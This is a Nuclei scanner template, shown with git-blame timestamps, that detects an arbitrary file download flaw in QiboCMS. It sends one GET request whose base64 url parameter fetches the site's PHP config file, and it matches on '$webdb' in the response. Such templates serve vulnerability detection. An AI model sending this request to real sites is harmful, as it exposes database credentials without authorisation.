2022-12-12 15:36:09 +00:00
|
|
|
id: qibocms-file-download
|
|
|
|
|
|
|
|
info:
|
2023-01-05 14:57:06 +00:00
|
|
|
name: Qibocms - Arbitrary File Download
|
2022-12-12 15:36:09 +00:00
|
|
|
author: theabhinavgaur
|
|
|
|
severity: high
|
2022-12-12 17:18:05 +00:00
|
|
|
metadata:
|
|
|
|
verified: true
|
2023-10-14 11:27:55 +00:00
|
|
|
max-request: 1
|
2022-12-16 17:48:35 +00:00
|
|
|
tags: qibocms,lfr
|
2022-12-12 15:36:09 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-12-12 15:36:09 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "<?php"
|
2022-12-12 17:12:18 +00:00
|
|
|
- "$webdb"
|
2022-12-12 15:36:09 +00:00
|
|
|
condition: and
|
|
|
|
|
2022-12-12 17:10:15 +00:00
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "filename=config"
|
|
|
|
|
2022-12-12 15:36:09 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 490a0046304402202c6815be4e274af7b5159756be6be0c4b40c2cb8c71c10b9657760b563d5a1d90220754631b38babc7faee6778bcedccf957f1bcb73b3d49c3408a3ce7947b087005:922c64590222798bb761d5b6d8e72950
|